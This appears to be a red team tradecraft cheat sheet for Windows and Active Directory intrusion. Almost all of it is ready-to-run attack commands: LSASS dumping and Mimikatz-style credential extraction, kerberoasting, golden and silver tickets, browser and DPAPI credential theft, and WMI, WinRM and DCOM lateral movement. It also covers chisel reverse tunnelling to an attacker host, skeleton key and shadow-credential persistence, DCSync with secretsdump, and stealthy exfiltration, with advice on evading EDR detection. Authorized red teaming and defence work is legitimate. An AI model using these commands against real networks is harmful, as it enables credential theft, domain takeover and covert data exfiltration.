Red Team
Red Team Tradecraft
Advanced techniques for credential harvesting, lateral movement, and achieving objectives while maintaining stealth and OPSEC.
Credential Access
In-Memory Credential Harvesting
Tip
Avoid touching disk. Execute tools in memory to reduce forensic artifacts.
bash
# Execute-assembly for in-memory execution
# Sliver
sliver > execute-assembly /path/to/SharpKatz.exe --Command logonpasswords
# Cobalt Strike
beacon> execute-assembly /path/to/Rubeus.exe kerberoast /format:hashcat
# Common credential tools:
# - SharpKatz (Mimikatz in C#)
# - Rubeus (Kerberos attacks)
# - SharpDPAPI (DPAPI secrets)
# - SharpChromium (Browser creds)
# - Seatbelt (Enumeration)LSASS Credential Extraction
bash
# Method 1: MiniDump via comsvcs.dll (common EDR detection)
rundll32.exe C:\windows\system32\comsvcs.dll, MiniDump [LSASS_PID] C:\temp\lsass.dmp full
# Method 2: Nanodump (stealthier)
# Creates minidump using syscalls, avoids hooks
nanodump.x64.exe --write C:\temp\lsass.dmp --valid
# Method 3: PPLdump (if Protected Process)
# Dumps LSASS even when running as PPL
PPLdump.exe [LSASS_PID] lsass.dmp
# Method 4: Duplicating LSASS handle
# Get handle from another process
HandleKatz.exe
# Parse dump offline
pypykatz lsa minidump lsass.dmp
mimikatz # sekurlsa::minidump lsass.dmpKerberos Attacks
bash
# Kerberoasting (target high-value SPNs)
execute-assembly Rubeus.exe kerberoast /user:sqlservice /format:hashcat /outfile:hashes.txt
# AS-REP Roasting
execute-assembly Rubeus.exe asreproast /format:hashcat /outfile:asrep.txt
# Golden Ticket (requires krbtgt hash)
execute-assembly Rubeus.exe golden /user:Administrator /domain:corp.local /sid:S-1-5-21-... /krbtgt:HASH /ptt
# Silver Ticket (service-specific)
execute-assembly Rubeus.exe silver /service:cifs/server.corp.local /user:Administrator /rc4:HASH /ptt
# Overpass-the-Hash
execute-assembly Rubeus.exe asktgt /user:admin /rc4:HASH /pttDPAPI Secrets
bash
# DPAPI protects:
# - Browser passwords
# - Windows Credential Manager
# - RDP saved creds
# - VPN credentials
# Extract DPAPI secrets
execute-assembly SharpDPAPI.exe credentials /target:C:\Users
# Browser credentials
execute-assembly SharpChromium.exe logins
execute-assembly SharpWeb.exe all
# Credential Manager
execute-assembly SharpDPAPI.exe credentialsLateral Movement
Technique Comparison
| Technique | Detection Risk | Requirements |
|---|---|---|
| PSExec | High | Admin, SMB |
| WMI | Medium | Admin, RPC |
| WinRM | Low-Med | WinRM enabled |
| DCOM | Low | Admin, RPC |
| SSH | Low | SSH enabled |
| RDP | Medium | RDP enabled |
WinRM Movement
powershell
# PowerShell Remoting (WinRM)
$cred = Get-Credential
Enter-PSSession -ComputerName TARGET -Credential $cred
# Invoke-Command for single commands
Invoke-Command -ComputerName TARGET -Credential $cred -ScriptBlock {whoami}
# Sliver
sliver > psexec TARGET -u admin -p password # Creates service
sliver > winrm TARGET -u admin -p password # Uses WinRM (stealthier)
# Cobalt Strike
beacon> jump winrm TARGET LISTENERWMI Movement
bash
# WMI process creation
wmic /node:TARGET process call create "cmd.exe /c whoami > C:\result.txt"
# PowerShell WMI
$cred = Get-Credential
Invoke-WmiMethod -ComputerName TARGET -Credential $cred -Class Win32_Process -Name Create -ArgumentList "cmd.exe /c ..."
# Impacket wmiexec
wmiexec.py domain/user:password@TARGET
# CrackMapExec
crackmapexec wmi TARGET -u user -p password -x "whoami"DCOM Movement
powershell
# DCOM (Distributed COM) lateral movement
# Less commonly monitored than WMI/PSExec
# ShellWindows object
$com = [Type]::GetTypeFromCLSID('9BA05972-F6A8-11CF-A442-00A0C90A8F39', "TARGET")
$obj = [System.Activator]::CreateInstance($com)
$obj.Document.Application.ShellExecute("cmd.exe", "/c whoami > C:\out.txt")
# ShellBrowserWindow
# MMC20.Application
# Outlook.Application
# Impacket dcomexec
dcomexec.py domain/user:password@TARGETPivoting
SOCKS Proxy
bash
# Sliver SOCKS proxy
sliver > socks5 start -P 1080
# Use with proxychains
# /etc/proxychains.conf: socks5 127.0.0.1 1080
proxychains nmap -sT 10.10.10.0/24
# Cobalt Strike
beacon> socks 1080
# Chisel
# Server (attacker)
chisel server -p 8080 --reverse
# Client (target)
chisel client ATTACKER:8080 R:socksPort Forwarding
bash
# Sliver port forward
sliver > portfwd add -b 127.0.0.1:8080 -r 10.10.10.5:80
# Now access 10.10.10.5:80 via localhost:8080
# SSH tunneling
ssh -L 8080:10.10.10.5:80 user@jumphost
# Reverse port forward (target to attacker)
ssh -R 9000:localhost:8080 user@attacker
# Ligolo-ng (modern alternative)
# Agent on target, proxy on attacker
# Creates virtual interface for direct accessPersistence
Stealthy Persistence Methods
text
# WMI Event Subscription (survives reboots)
# Creates filter, consumer, and binding
# Executes when event condition is met
# Golden Ticket (domain persistence)
# Requires krbtgt hash
# Valid for 10 years by default
# Survives password resets (except krbtgt)
# Skeleton Key (in-memory DC backdoor)
# Master password works for any account
# Lost on reboot, must reapply
# AdminSDHolder
# Modifies protected AD objects
# ACL propagates every 60 minutes
# DCSync via ACL abuse
# Add replication rights to controlled account
# Persistent DCSync capabilityCertificate-Based Persistence
bash
# ADCS abuse for persistence
# Request certificate for target user
# Certificate valid for years
# Certipy
certipy req -u user@corp.local -p password -target CA_SERVER -ca CA_NAME -template User
# Use certificate for authentication
certipy auth -pfx user.pfx -dc-ip DC_IP
# Shadow Credentials
# Add certificate to msDS-KeyCredentialLink
# Can authenticate as target user
# Whisker (add shadow credential)
Whisker.exe add /target:admin /domain:corp.localDomain Escalation
Attack Paths
flowchart TD
A[Initial Access] --> B[Local Admin]
B --> C[Credential Harvest]
C --> D[Lateral Movement]
D --> E[High Value Target]
E --> F[Domain Admin]
F --> G[Domain Dominance]
style A fill:#ff6b6b,stroke:#000,color:#000
style F fill:#a855f7,stroke:#000,color:#000
style G fill:#00ff00,stroke:#000,color:#000
bash
# Common escalation paths:
# 1. Kerberoast service account
GetUserSPNs.py -request -dc-ip DC corp.local/user:pass
# Crack hash -> service account password
# 2. ADCS misconfiguration
certipy find -vulnerable -u user@corp.local -p pass
# Exploit template for domain admin cert
# 3. Delegation abuse
# Find unconstrained delegation
Get-DomainComputer -Unconstrained
# Coerce authentication to capture TGT
# 4. ACL abuse (via BloodHound)
# GenericAll, WriteDACL, ForceChangePassword
# Chain permissions to domain admin
# 5. GPO abuse
# Modify GPO that applies to domain admins
# Add local admin, scheduled task, etc.DCSync
bash
# DCSync - replicate credentials from DC
# Requires: DS-Replication-Get-Changes + DS-Replication-Get-Changes-All
# Mimikatz
lsadump::dcsync /user:Administrator /domain:corp.local
# Impacket
secretsdump.py corp.local/admin:password@DC_IP -just-dc-ntlm
# Specific user
secretsdump.py corp.local/admin:password@DC_IP -just-dc-user Administrator
# Get krbtgt for Golden Ticket
secretsdump.py corp.local/admin:password@DC_IP -just-dc-user krbtgtData Exfiltration
text
# Low and slow exfiltration
# - Small chunks over time
# - Use allowed protocols
# - Blend with normal traffic
# DNS exfiltration
# Encode data in DNS queries
# Very slow but hard to detect
# HTTPS POST
# Mimic legitimate application traffic
# Use categorized domains
# Cloud services
# Upload to OneDrive, Dropbox, etc.
# If allowed by organization
# Encrypted archives
# Compress and encrypt before exfil
# Password-protect sensitive data